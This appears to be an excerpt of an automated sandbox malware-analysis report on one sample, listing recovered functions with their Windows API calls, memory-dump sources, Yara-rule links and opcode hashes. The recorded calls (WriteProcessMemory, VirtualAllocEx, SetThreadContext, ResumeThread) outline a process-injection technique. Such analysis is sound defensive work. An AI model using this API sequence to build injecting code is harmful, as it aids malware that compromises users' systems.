                Function 076881B8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                Download Yara Rule
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07688248
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 5d8426fa3ba55fab5dfdfabb2d8be0f1b7a2271dddd119802d1e1f21e685d96a
                • Instruction ID: 56c8261149f0ca3ce78b9cfab37518abdc4c442337ddb10ee873ef346b9ca5e5
                • Opcode Fuzzy Hash: 5d8426fa3ba55fab5dfdfabb2d8be0f1b7a2271dddd119802d1e1f21e685d96a
                • Instruction Fuzzy Hash: 5B2157B1D0030A9FCB10DFA9C885BDEBBF5FF88310F108429E919A7240C778A945CBA1
                Function 07688E78 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                Download Yara Rule
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07688EFE
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: abae735817d701ba2969639e7368d74f4a81000be0e468df741ae0d29178b07f
                • Instruction ID: 5b13b35af80c3bc604ace2c010c5f39113c75ab35fbf2c86971d0fa150583826
                • Opcode Fuzzy Hash: abae735817d701ba2969639e7368d74f4a81000be0e468df741ae0d29178b07f
                • Instruction Fuzzy Hash: E62137B2D102098FDB50DFAAC4857EEBBF5EF88324F14842AD45AA7240D7789945CFA1
                Function 07687768 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                Download Yara Rule
                APIs
                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 076877EE
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 3914f9d2d3052d9c953c4286d5dd36fe08edc13c16901b22c16f1fc3b721df2f
                • Instruction ID: 2b18aaf21c303d541ea355d039ec351d9ce7cb67dd7a2610738a290adcdfee99
                • Opcode Fuzzy Hash: 3914f9d2d3052d9c953c4286d5dd36fe08edc13c16901b22c16f1fc3b721df2f
                • Instruction Fuzzy Hash: 392139B5D002098FDB10DFA9C5857EEBBF4AF48315F24C429D419A7241D7789945CF91
                Function 07687770 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                Download Yara Rule
                APIs
                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 076877EE
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: d3293fc4d82bca28039cf8e2024a0acfb3cae010e56bc917f3b417da2b545cb3
                • Instruction ID: 32dea57b5aaab1c6e1b6522837139f9d541053bb2c4f3dfd6394e7d691612890
                • Opcode Fuzzy Hash: d3293fc4d82bca28039cf8e2024a0acfb3cae010e56bc917f3b417da2b545cb3
                • Instruction Fuzzy Hash: 5F2107B1D003098FDB10DFAAC4857AEBBF5EF88325F248429D559A7240D7789945CFA1
                Function 07688E80 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                Download Yara Rule
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07688EFE
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 900e08edbbd821fb0f8a8e836384bb02b167f5051de01f625acf8b7c45bdb8be
                • Instruction ID: d1bce9ea8ca39584438d21453880b8ad21b07906ef29bcf9d12f36ec1a790f59
                • Opcode Fuzzy Hash: 900e08edbbd821fb0f8a8e836384bb02b167f5051de01f625acf8b7c45bdb8be
                • Instruction Fuzzy Hash: 6C2138B1D103098FDB10DFAAC4857EEBBF5EF88314F54842AD419A7240D7789945CFA1
                Function 076886A9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                Download Yara Rule
                APIs
                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 07688727
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 9bbac32d7dbe802899eea2f1d79691282a633f8566bdaa9b9e31108be42dd6d3
                • Instruction ID: d4cd1d06791eb2d220da53b9e606f0040e30724fd827ca5f6fa73fd5e01f0662
                • Opcode Fuzzy Hash: 9bbac32d7dbe802899eea2f1d79691282a633f8566bdaa9b9e31108be42dd6d3
                • Instruction Fuzzy Hash: 922138B2C002098FDB10DFAAC845BEEBBF5FF48320F50842AD419A7250C7389945DFA1
                Function 076886B0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                Download Yara Rule
                APIs
                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 07688727
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 0b7c43fd4064850d758af6601bea5484cdbbab9577a5821d9c4277799105545b
                • Instruction ID: 6fa4be8bcb47bf663f6e58733b67326a246f0095f735666ed81b027f3afcd4f3
                • Opcode Fuzzy Hash: 0b7c43fd4064850d758af6601bea5484cdbbab9577a5821d9c4277799105545b
                • Instruction Fuzzy Hash: 1E2138B1C002099FCB10DFAAC444AEEBBF5EF88320F508429D419A7250C7789945DFA1
                Function 07CD1054 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                Download Yara Rule
                APIs
                • DeleteFileW.KERNELBASE(00000000), ref: 07CDA080
                Memory Dump Source
                • Source File: 00000000.00000002.2510069372.0000000007CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CD0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7cd0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 0a92585103b263c7341b80b6651cf8477569ad140eecd845c255f29f67c2bef0
                • Instruction ID: c64870667cfb6ce8c7ae21cc2002f44da11f126418314521f1fc5c67a49346f6
                • Opcode Fuzzy Hash: 0a92585103b263c7341b80b6651cf8477569ad140eecd845c255f29f67c2bef0
                • Instruction Fuzzy Hash: F52127B1C0061A9BCB14DFAAC4447AEFBF4EB48310F15C52AD959A7240D378A944CFA5
                Function 0756E708 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0756E77B
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 3bcf19c36c0f5adbf43858a80ae5f74dbf4588f7bf1703ed11cab1e9232d82a2
                • Instruction ID: 9db551730307ce095bfa42e4909fab486a5bd5ac49362a53b62c99944dec6b6b
                • Opcode Fuzzy Hash: 3bcf19c36c0f5adbf43858a80ae5f74dbf4588f7bf1703ed11cab1e9232d82a2
                • Instruction Fuzzy Hash: 6021E4B5D002499FCB10DF9AC885BDEFBF8FB48320F10842AE959A7250D378A545DFA5
                Function 07568670 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075686E3
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 10810505e4e76bb90ca2555cec842ae9957d597ec9d51680673a60ec81af2f4a
                • Instruction ID: 614ae05615bb2f500ea9cfcfdad7c8da9500ac037641edcab94f4dcecfd699a6
                • Opcode Fuzzy Hash: 10810505e4e76bb90ca2555cec842ae9957d597ec9d51680673a60ec81af2f4a
                • Instruction Fuzzy Hash: 4A2114B5D002499FCB10CF9AC888BDEFBF4FB48320F10842AE858A3250D378A544CFA5
                Function 07687E39 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07687EAE
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: b370ce1d2985a8d7389d48a837956d1f004cde230f802557db3146871f4ba2af
                • Instruction ID: 2d50cf685505c2a26b2b81f5ca56469c7668d65c241c613af9942e5db3751f35
                • Opcode Fuzzy Hash: b370ce1d2985a8d7389d48a837956d1f004cde230f802557db3146871f4ba2af
                • Instruction Fuzzy Hash: BE1159B6D002099FCB10DFA9C8456EEBFF5EF88310F20881AD519A7250C7359941CFA1
                Function 07687E40 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07687EAE
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: c6d609b20af4f62cad89527d2671294dc10fd801a974f148d0b72cf89cff2aef
                • Instruction ID: dc23ab5c961acf981791e9a63eb598ebff2bd5eb3a2b9c29a268e35b2547695e
                • Opcode Fuzzy Hash: c6d609b20af4f62cad89527d2671294dc10fd801a974f148d0b72cf89cff2aef
                • Instruction Fuzzy Hash: 791129B2D002499FCB10DFA9C845ADFBFF5EF88314F208419D519A7250C775A945DFA1
                Function 07689508 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: 872dac2a0c5a1b2aa430e45283986e76104d53ed478394de69fd1ea438f1d276
                • Instruction ID: 8f8f6dee656a77eaed1dcda2e8f686e9a131caca66a8636eb4e847bcd5ef7bab
                • Opcode Fuzzy Hash: 872dac2a0c5a1b2aa430e45283986e76104d53ed478394de69fd1ea438f1d276
                • Instruction Fuzzy Hash: 361158B1D003498ACB20DFA9C4457EEFBF5EF88324F20891AC41AA7240C7346645CF91
                Function 07689510 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: 815964deec37820d531084310b6bbfd8cf3a8281f54af4ce4159535835cbba8b
                • Instruction ID: 36cc836c17968277995f6b9aeb70569dec7f0c94172bfeb8f69fa14d31a24ad4
                • Opcode Fuzzy Hash: 815964deec37820d531084310b6bbfd8cf3a8281f54af4ce4159535835cbba8b
                • Instruction Fuzzy Hash: 751128B1D003498BCB20DFAAC4457EEFBF5EB88324F208419D51AA7250C775A545CF91
                Function 07688F98 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07689B5D
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 2301ca5121c023dda9035abd71b20158fa0bef9241d16475c183498a5bcd2e8b
                • Instruction ID: 023377b42c2bf495232bccbcb8e176e256c86af378a13fdcfac95fd4566841ed
                • Opcode Fuzzy Hash: 2301ca5121c023dda9035abd71b20158fa0bef9241d16475c183498a5bcd2e8b
                • Instruction Fuzzy Hash: 761103B58003499FDB10DF9AD849BEEFBF8EB48310F20851AE919A7310C375A944CFA5
                Function 07689AF8 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07689B5D
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: f540c9ac20ee046868b5d37ac9b89d2896aad80580a37061b39f3b7fdb0cc999
                • Instruction ID: 3b6d6c41b061c0fcaadd244fce007a57475d2de01f99f766f3cb9114809af92f
                • Opcode Fuzzy Hash: f540c9ac20ee046868b5d37ac9b89d2896aad80580a37061b39f3b7fdb0cc999
                • Instruction Fuzzy Hash: 1C1103B5800309DFDB10DF99D585BDEBBF4EB48320F20891AD519A7310C374AA84CFA5
                Function 00EAA3E0 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: 4'cq
                • API String ID: 0-182294849
                • Opcode ID: b0265e62e0b1f075b043e4e3418f26cc16c2b8954f4c566121f548ee122d2781
                • Instruction ID: 84d8a38dbc5f1d2994cd71029cd04d69bca07bf260c38eee7978f1c704668cf0
                • Opcode Fuzzy Hash: b0265e62e0b1f075b043e4e3418f26cc16c2b8954f4c566121f548ee122d2781
                • Instruction Fuzzy Hash: EE619D317042418FC714DF39C898A6A7BE5AF4E30471994BAE816DF361DB71EC41CB62
                Function 07B7DD00 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: PHcq
                • API String ID: 0-4245845256
                • Opcode ID: 053050b3b02ae1f4885535fb9d0f0d4608e349caea2e11d79834131de016455f
                • Instruction ID: fc3cef1ba079a1a3fa89d83eaa90b7716dd5abc0842894eb5754fa0bfbaadb39
                • Opcode Fuzzy Hash: 053050b3b02ae1f4885535fb9d0f0d4608e349caea2e11d79834131de016455f
                • Instruction Fuzzy Hash: 82516AB0700106CFEB19DF68C884BA9B7B2FF49354F1585A9E416DB2A1DB31EC85CB90
                Function 07B73050 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Hgq
                • API String ID: 0-2103768809
                • Opcode ID: 7fecd795849d41dd01a81b0004394b25aad4b0ad364ed68e1a4860c01e148a42
                • Instruction ID: 78ec448d5e7b658bf62f97939a233b0ac09c8155dc0b08f035fd5aa41662ccb4
                • Opcode Fuzzy Hash: 7fecd795849d41dd01a81b0004394b25aad4b0ad364ed68e1a4860c01e148a42
                • Instruction Fuzzy Hash: 9F4113723001519BDB056BB9989467F7BABEFC4311F54846AE805DB395DE39CC42C3D1
                Function 00EA8160 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: (ocq
                • API String ID: 0-1855696158
                • Opcode ID: c152390571dc18f0a45a979498f141b9605f428c8ec35440ea73ff042d16cc7c
                • Instruction ID: c5be02ede00543dd464487c6dcef0198525ebc729166d80e230fe88624ac33b7
                • Opcode Fuzzy Hash: c152390571dc18f0a45a979498f141b9605f428c8ec35440ea73ff042d16cc7c
                • Instruction Fuzzy Hash: DF41C0717002049FDB14AB68D964AAE7BF6FFCD710F144469E906EB391DE35AC06CBA0
                Function 07B7AF60 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: PHcq
                • API String ID: 0-4245845256
                • Opcode ID: f72086be276749d42300eeea8ad0db9f7ae7ae0fda28220a5c2bfb6b040c170a
                • Instruction ID: 05e66bbd062f4d93ca8a5399659f556d335ad4d896a9cc216e42e979fa118155
                • Opcode Fuzzy Hash: f72086be276749d42300eeea8ad0db9f7ae7ae0fda28220a5c2bfb6b040c170a
                • Instruction Fuzzy Hash: 9E51F3B4600205CFDB14DF68C598E9AB7F1EF48715B2585A8E426EB3A1DB31EC41CF50
                Function 00EA4AD7 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: 8gq
                • API String ID: 0-1984363304
                • Opcode ID: b7555b7c3a71df63fbc40fd030b6a5ab42a80aba27feac4157360d8d482882a1
                • Instruction ID: bc7f7a9da62379c511ae90d3b09d8c4854a92f30f6647ae3dde55a1759476bc2
                • Opcode Fuzzy Hash: b7555b7c3a71df63fbc40fd030b6a5ab42a80aba27feac4157360d8d482882a1
                • Instruction Fuzzy Hash: E75190B4E05208DFDB04DFA9D580ADDBBB6FF89300F205169E419AB365DB70A945CF40
                Function 00EAD688 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Hgq
                • API String ID: 0-2103768809
                • Opcode ID: 9281f3282b2af76eaf93c6400a54ed4aaef0bd8c44dff8a8f14eb7a39d633089
                • Instruction ID: 75c2c786fad273ac79cf0000db0dcb7aa2437819908c0d863cbb36ceaed19be6
                • Opcode Fuzzy Hash: 9281f3282b2af76eaf93c6400a54ed4aaef0bd8c44dff8a8f14eb7a39d633089
                • Instruction Fuzzy Hash: 7E41D6353046559FCB05AF28D8246AA3BE6FF8A310F048069F81ADF791DB38EC11D791
                Function 00EAA1E0 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: 4'cq
                • API String ID: 0-182294849
                • Opcode ID: 0adc0d8b309caa3795f3d8093d78a4b3952ffd685fb58d50663888280a0983ba
                • Instruction ID: c3799d8b7aff3aaab0257af7f3653dfb3c2d363329a033b1e2fa532d07a4335f
                • Opcode Fuzzy Hash: 0adc0d8b309caa3795f3d8093d78a4b3952ffd685fb58d50663888280a0983ba
                • Instruction Fuzzy Hash: 5E4158346002159FCB149F68D848BAE3BB5FB8D315F154069E906DB3B0C735EC50CBA2
                Function 00EA4B08 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: 8gq
                • API String ID: 0-1984363304
                • Opcode ID: e7afad5b1b32c3d3ef1b2c48c5205174c9688de18e4fbbc88ea09f9a90a33f13
                • Instruction ID: b2e341820b1cada49ded3f748c85e16d2c71cadf5e787ed95eb01730c455adc0
                • Opcode Fuzzy Hash: e7afad5b1b32c3d3ef1b2c48c5205174c9688de18e4fbbc88ea09f9a90a33f13
                • Instruction Fuzzy Hash: 9041A1B4E012089FDB04DFA9C984ADDBBF2FF89300F20416AE419AB365DB74A945CF40
                Function 07B777C0 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: $cq
                • API String ID: 0-2110363268
                • Opcode ID: 08ba6565debc869ddc53fb18996525896006253ec6ec2d769413fe52c478fab4
                • Instruction ID: 8fee8511ad31ebdc89e12c1d6b8219c634190c4bd8ab94776c52d9d403c15887
                • Opcode Fuzzy Hash: 08ba6565debc869ddc53fb18996525896006253ec6ec2d769413fe52c478fab4
                • Instruction Fuzzy Hash: BA2151F47241118FEB18DA7BC84893A77E6EFC561175544E9E426CB361DF34C802C751
                Function 07B777B0 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: $cq
                • API String ID: 0-2110363268
                • Opcode ID: 287f2b52099144338365e09b4931e6dd41eb931e30e3c047843364bd658750c1
                • Instruction ID: 46f612d2448c3327cf263ddfcb21b13cd29b48ac6d52373e9b8a6d75ec28189c
                • Opcode Fuzzy Hash: 287f2b52099144338365e09b4931e6dd41eb931e30e3c047843364bd658750c1
                • Instruction Fuzzy Hash: 5E214FF47146018FEB159B2BC84CA2A77E5FFC5611B1941E9E82ACB261DF34C842C651
                Function 0721E7B3 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: <
                • API String ID: 0-4251816714
                • Opcode ID: 646a23095789b709487878d4d4d20822c812b2be49e1ea1d6cf788060401bb61
                • Instruction ID: 22b7fea455abe6ee8ec80cc0648b3396211905a7080d38e94643a93cb0df3890
                • Opcode Fuzzy Hash: 646a23095789b709487878d4d4d20822c812b2be49e1ea1d6cf788060401bb61
                • Instruction Fuzzy Hash: 2E01C0B4E20269DFDB60CFA4CD85B9DBBB0BB48202F1145DA9509B7350CB745A80CF65
                Function 0721CFC0 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: 9H[
                • API String ID: 0-283265660
                • Opcode ID: 8278c7076c8b33932621f99dd7a95b2e7135e63a46b224ac9063106f9725038d
                • Instruction ID: d3ebc05eb0a8ccfbfd4939e86cf379386d6b4f5298dc340013cb7c8feb61e770
                • Opcode Fuzzy Hash: 8278c7076c8b33932621f99dd7a95b2e7135e63a46b224ac9063106f9725038d
                • Instruction Fuzzy Hash: 3CD012362941099E4B40EBE4E810D9277DDBB247107008422E504C7530E722E874E7A1
                Function 0721B658 Relevance: .6, Instructions: 598COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 54f5cc2b72976e10f94032ad8bbcaff62ebd58c32979b06b3c8427a5806fc3df
                • Instruction ID: 9d5b861057e52dcfc6e5d2f059ab7095e3db1904e9cad2080aa84a994c54c645
                • Opcode Fuzzy Hash: 54f5cc2b72976e10f94032ad8bbcaff62ebd58c32979b06b3c8427a5806fc3df
                • Instruction Fuzzy Hash: 6E123670B143468FCB05FBBCDA9962E7BB6BF86200F4548A9D045E3399DE389D05D362
                Function 0721D1D5 Relevance: .6, Instructions: 559COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6bd0f77c669f999101e5390d44efe98eeddc6fb047746226b7dfcce3de174030
                • Instruction ID: 83d52b9205a6adcd988fac6af19e444894c1a2816a442c041f0e6ec8340fdae3
                • Opcode Fuzzy Hash: 6bd0f77c669f999101e5390d44efe98eeddc6fb047746226b7dfcce3de174030
                • Instruction Fuzzy Hash: 77A1AC71B14611CFC704BB7CE58E62D7BF6BB89210F858DACE089872A4DE38D809C752
                Function 0721D1AD Relevance: .5, Instructions: 526COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 560f20979b5e9f4a831482e4655f03c81c7c4238304526526bde4ac9ab71497d
                • Instruction ID: dd0d302f6cbf1844ac425fc0fac6f064a001c959eb1cbaf5347e1b424ef1f765
                • Opcode Fuzzy Hash: 560f20979b5e9f4a831482e4655f03c81c7c4238304526526bde4ac9ab71497d
                • Instruction Fuzzy Hash: 70A1AE71B14611CBC704BB7CE55E62D7BF6BB89210F858DACE489873A8DE38D809C752
                Function 0721AC51 Relevance: .4, Instructions: 432COMMON
